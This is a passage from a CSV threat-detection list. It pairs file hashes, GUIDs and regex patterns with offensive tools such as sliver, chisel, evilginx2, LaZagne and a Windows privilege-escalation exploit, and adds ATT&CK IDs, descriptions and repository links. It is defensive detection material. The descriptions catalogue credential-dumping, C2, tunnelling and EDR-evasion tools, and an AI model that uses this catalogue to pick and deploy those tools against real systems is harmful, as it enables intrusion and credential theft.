TA0043","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","0","N/A","10","10","7579","1023","2024-05-01T04:32:17Z","2019-01-17T22:07:38Z" "*78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975*",".{0,1000}78c15e32aa0d34c32550129f8f40cd76da56bef72a5efd949f92563876a74975.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*78C76961-8249-4EFE-9DE2-B6EF15A187F7*",".{0,1000}78C76961\-8249\-4EFE\-9DE2\-B6EF15A187F7.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029*",".{0,1000}78eed41cec221edd4ffed223f2fd2271a96224fd1173ed685c8c0b274fe93029.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e*",".{0,1000}78fb6b3b97fe4c42400a477e013f1f848a5ccec7d4cf51d7087faf0583ad491e.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575*",".{0,1000}793f49ad93a26d3c9407ac76af0a8785610db3216cc96b348f6417c2e3583575.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7943C5FF-C219-4E0B-992E-0ECDEB2681F3*",".{0,1000}7943C5FF\-C219\-4E0B\-992E\-0ECDEB2681F3.{0,1000}","offensive_tool_keyword","BackupCreds","A C# implementation of dumping credentials from Windows Credential Manager","T1003 - T1555","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/leftp/BackupCreds","1","0","N/A","9","1","51","6","2023-09-23T10:37:05Z","2023-09-23T06:42:20Z" "*79520C3A-4931-46EB-92D7-334DA7FC9013*",".{0,1000}79520C3A\-4931\-46EB\-92D7\-334DA7FC9013.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","10","1","N/A","N/A","N/A","N/A" "*795f2e9d0314898ba5a63bd1fdc5fa18*",".{0,1000}795f2e9d0314898ba5a63bd1fdc5fa18.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/yarrick/iodine","1","0","N/A","10","10","5794","495","2023-11-29T23:29:17Z","2012-02-04T19:51:39Z" "*79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805*",".{0,1000}79816edc41cd5e2aeb19f0227e9cb9ab0b5abcc54931c6bf29813f8762828805.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104*",".{0,1000}79acacd2433990d8fe71ee9583123240b34ae26f4913d62b796238f4a302e104.{0,1000}","offensive_tool_keyword","powercat","Netcat - The powershell version","T1571 - T1048.003 - T1095","TA0042 - TA0011","N/A","N/A","C2","https://github.com/besimorhino/powercat","1","0","N/A","10","10","2034","462","2024-03-05T18:05:07Z","2014-08-21T14:38:46Z" "*79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850*",".{0,1000}79f4a5f47346781f2b5d7ffbf570db04e0410c435b5bf993ce4e3e3bfbc6e850.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*79F54747-048D-4FD6-AEF4-7B098F923FD8*",".{0,1000}79F54747\-048D\-4FD6\-AEF4\-7B098F923FD8.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","N/A","10","3","275","36","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z" "*7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f*",".{0,1000}7a2fb0b27e7c44f2a37ad254df79b3677b010d34bf6421281a2a37c1088d613f.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f*",".{0,1000}7a32219b9b7ba4fca2fd03d0f2387245b9f3049521b9076a5ab4a21f57bb977f.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7*",".{0,1000}7a324791d74e0a99c63686f9e2cd5be616286fbd19b74f780de251e3d8ab87a7.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3*",".{0,1000}7a40166148f77773238e3e5ad7572068d0b935303278f007c6c75dd3e9e302b3.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64*",".{0,1000}7a51ed902fc804066c4617af21d0325cceebce588ca66709c697916ce5214e64.{0,1000}","offensive_tool_keyword","wstunnel","Tunnel all your traffic over websocket protocol - Bypass firewalls/DPI - Static binary available","T1572 - T1090 - T1071","TA0005- TA0010 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/erebe/wstunnel","1","1","N/A","10","10","3088","282","2024-05-01T13:54:55Z","2016-05-14T23:58:43Z" "*7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81*",".{0,1000}7a6b32cadac1e4193540c181b169ce4e73dc69a5bb185b9e98842a4e4205cc81.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49*",".{0,1000}7a6baa66cbbfa32e37a003017e6a24ae5ba2764f39039a56d7556f2931824e49.{0,1000}","offensive_tool_keyword","evilginx2","Standalone man-in-the-middle attack framework used for phishing login credentials along with session cookies allowing for the bypass of 2-factor authentication","T1557.002 - T1114 - T1539","TA0002 - TA0003 - TA0008","N/A","N/A","Sniffing & Spoofing","https://github.com/An0nUD4Y/evilginx2","1","0","file_hash","10","1","69","16","2024-04-24T19:24:31Z","2020-07-10T06:01:11Z" "*7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45*",".{0,1000}7a8cabbb37d569b2d9af56a4a11bb83dc5bb839c3d4a3ea05252e20e2d0c3a45.{0,1000}","offensive_tool_keyword","SharpDllProxy","Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading","T1036 - T1036.005 - T1070 - T1070.004 - T1071 - T1574.002","TA0002 - TA0003 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Flangvik/SharpDllProxy","1","0","N/A","N/A","7","663","81","2020-07-21T17:14:01Z","2020-07-12T10:46:48Z" "*7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760*",".{0,1000}7a9a81c7ef99897281466ea06c14886335cf8d4c835f15aeb1e3a2c7c1d0e760.{0,1000}","offensive_tool_keyword","AMSI-Provider","A fake AMSI Provider which can be used for persistence","T1546.013 - T1574.012","TA0005 - TA0003","N/A","N/A","Persistence","https://github.com/netbiosX/AMSI-Provider","1","0","N/A","10","2","133","15","2021-05-16T16:56:15Z","2021-05-15T16:18:47Z" "*7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332*",".{0,1000}7aa369f9365c35abe1cfea6a209a8a6071d7af3377a357f94721860c02e4d332.{0,1000}","offensive_tool_keyword","ADFSDump","A C# tool to dump all sorts of goodies from AD FS","T1081 - T1003 - T1114 - T1212","TA0006 - TA0005 - TA0009","N/A","N/A","Credential Access","https://github.com/mandiant/ADFSDump","1","0","N/A","10","3","287","63","2023-08-07T16:58:37Z","2019-03-20T22:31:16Z" "*7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc*",".{0,1000}7aa6a3be25f05eb6a5c5cda7f10e48007dae601c9918a9734db3697ed6c63afc.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67*",".{0,1000}7aa90fa85c912e188d6c8d0668574285af14157c5d7b73e48d339d8a3f5dcf67.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef*",".{0,1000}7ac42abfb232c1b9f235969fcebf54bad0078e724552cdd89b5f32805b77a4ef.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22*",".{0,1000}7acbf2c647d3fd9b61f6c3c8cdc8bcd3afd9f4dd1c2a95a3b30dde583b95ed22.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9*",".{0,1000}7af0afcd0f9db86c97a7357aaaedd26ab3746e828d5c0febdd063099d0d3fee9.{0,1000}","offensive_tool_keyword","vbad","VBad is fully customizable VBA Obfuscation Tool combined with an MS Office document generator. It aims to help Red & Blue team for attack or defense.","T1564 - T1117 - T1204 - T1070","TA0002 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/Pepitoh/Vbad","1","0","N/A","8","6","517","128","2017-10-15T12:56:18Z","2016-03-09T12:36:04Z" "*7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41*",".{0,1000}7afe27385edf41f8365eed21b7f34467b574f2cb91f618ddcae75024f6403c41.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","can also be used by blueteam as a honeypot","10","10","1434","239","2024-02-28T06:08:59Z","2018-09-07T19:17:41Z" "*7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74*",".{0,1000}7b05dd49119858395e365446d7168cc725a999d9d98b7ccabfafc3b5da7a6f74.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5*",".{0,1000}7b1aa993de7f49a7731c952cf3abedad501f45dc378e18b9b8245eaba78e72c5.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9*",".{0,1000}7b206d4ff0ebe922b4242b4821c84f9e5c05579fdc4c43033ae9a45f6494cac9.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d*",".{0,1000}7b2ce8fed0da2a756ac78ee68f0885399ee5fa57e6a182e3b8fbffc1c523710d.{0,1000}","offensive_tool_keyword","brutespray","BruteSpray takes nmap GNMAP/XML output or newline seperated JSONS and automatically brute-forces services with default credentials using Medusa. BruteSpray can even find non-standard ports by using the -sV inside Nmap.","T1110","TA0001 - TA0043","N/A","N/A","Credential Access","https://github.com/x90skysn3k/brutespray","1","0","N/A","10","10","1922","376","2024-04-30T13:32:24Z","2017-04-05T17:05:10Z" "*7B4D3810-4A77-44A1-8546-779ACF02D083*",".{0,1000}7B4D3810\-4A77\-44A1\-8546\-779ACF02D083.{0,1000}","offensive_tool_keyword","SharpEventPersist","Persistence by writing/reading shellcode from Event Log","T1055 - T1070.001 - T1547.001","TA0003 - TA0005","N/A","N/A","Persistence","https://github.com/improsec/SharpEventPersist","1","0","N/A","10","10","360","53","2022-05-27T14:52:02Z","2022-05-20T14:52:56Z" "*7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d*",".{0,1000}7b5930fe71b9746fe6fd52455d84ddbc740d1730be6028473ed501058f0f393d.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764*",".{0,1000}7b70c0af1d1d20eb090e2fad0afceef71e12b1083956dd7d58b181425478b764.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","12092","1297","2024-04-30T07:23:21Z","2015-02-25T11:42:50Z" "*7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667*",".{0,1000}7ba12c9d99dc22ef178a75886a1c843302e65906d7c15e4aed54066fbae41667.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a*",".{0,1000}7bc64714fb90bddef226c04fb69f30d689384e3f0dfb89934c73ad1486e76e3a.{0,1000}","offensive_tool_keyword","CredMaster","CredKing password spraying tool - uses FireProx APIs to rotate IP addresses","T1110.003 - T1596 - T1071.004","TA0006 - TA0043","N/A","N/A","Credential Access","https://github.com/knavesec/CredMaster","1","0","file_hash","9","9","874","109","2024-04-26T19:03:31Z","2020-09-25T20:57:42Z" "*7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c*",".{0,1000}7bc9e0e60db343690d6dcb61dd7f19c69fbd154234cbc38f7631f4a4a75fca8c.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","8","2","154","32","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z" "*7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b*",".{0,1000}7beae9c75c8e6e87a776f82461256a983e0fcd2ab169ea2293efa08f486ed33b.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","N/A","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","file_hash","8","10","7984","1339","2024-04-19T07:11:03Z","2020-11-13T16:35:20Z" "*7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa*",".{0,1000}7becedb670137807e079f535c7bec03131414f90e8e2a70e4c989b9d9167f4aa.{0,1000}","offensive_tool_keyword","Invoke-Stealth","Simple & Powerful PowerShell Script Obfuscator","T1027.004","TA0005","N/A","N/A","Defense Evasion","https://github.com/JoelGMSec/Invoke-Stealth","1","0","N/A","9","4","N/A","N/A","N/A","N/A" "*7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022*",".{0,1000}7bf796eca83019bad71db3ac9570b92d9f02ce7fa02d2891ef0116cb991fe022.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tools","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","8","10","N/A","N/A","N/A","N/A" "*7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1*",".{0,1000}7c0e4bfa155808eba7c7c65fb62dcde013f4061437e1622f3fdbc255d85d38a1.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","0","#file_hash","10","10","2098","309","2024-04-28T18:45:08Z","2020-06-05T12:50:00Z" "*7C5C471B-9630-4DF5-A099-405D86553ECA*",".{0,1000}7C5C471B\-9630\-4DF5\-A099\-405D86553ECA.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","0","N/A","10","2","147","39","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z" "*7C6D1CCD-D4DF-426A-B5D6-A6B5F13D0091*",".{0,1000}7C6D1CCD\-D4DF\-426A\-B5D6\-A6B5F13D0091.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","N/A","6","10","3512","1595","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z" "*7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b*",".{0,1000}7c6f4b0023b62103aa803d4ddfe2736ed80f2911f7556ef16abc3be04674697b.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109*",".{0,1000}7c8c4d1e312218cb8a31c00d67f3b5e2e752d9e094e37c959e35e0483fc69109.{0,1000}","offensive_tool_keyword","ShellServe","Multi-client network fileserver with integrated shell functionality crafted in C using system calls for efficient and direct file and command processing","T1059 - T1505 - T1046 - T1569","TA0002 - TA0007 - TA0003","N/A","N/A","Data Exfiltration","https://github.com/7etsuo/ShellServe","1","0","N/A","6","1","N/A","N/A","N/A","N/A" "*7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6*",".{0,1000}7c8dcea2da2cd78b706f7e08ff49f7733008ce357fba21777d17334abf0458a6.{0,1000}","offensive_tool_keyword","GTFONow","Automatic privilege escalation for misconfigured capabilities - sudo and suid binaries using GTFOBins.","T1548.003 - T1548.002 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/Frissi0n/GTFONow","1","0","N/A","6","10","N/A","N/A","N/A","N/A" "*7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e*",".{0,1000}7c8dd8b38777d6701ea54b98193216b808e2c7cb560a7cf1c07ef9e6b134dc9e.{0,1000}","offensive_tool_keyword","SharpSploit","SharpSploit is a .NET post-exploitation library written in C# that aims to highlight the attack surface of .NET and make the use of offensive .NET easier for red teamers.","T1055 - T1086 - T1003 - T1053 - T1547 - T1110 - T1021 - T1070 - T1562 - T1574 - T1543 - T1098","TA0002 - TA0003 - TA0005 - TA0006 - TA0010 - TA0040","N/A","N/A","Exploitation tools","https://github.com/cobbr/SharpSploit","1","0","N/A","10","10","1692","303","2021-08-12T18:23:15Z","2018-09-20T14:22:37Z" "*7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed*",".{0,1000}7c9132c6c40c456396370d2e9cec4ee32b8cd289b29ccca946ea79f185eeaeed.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","0","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed*",".{0,1000}7c935380a6f783ea10d0b8358d323f4238398320e1feada66ab08051be6982ed.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - 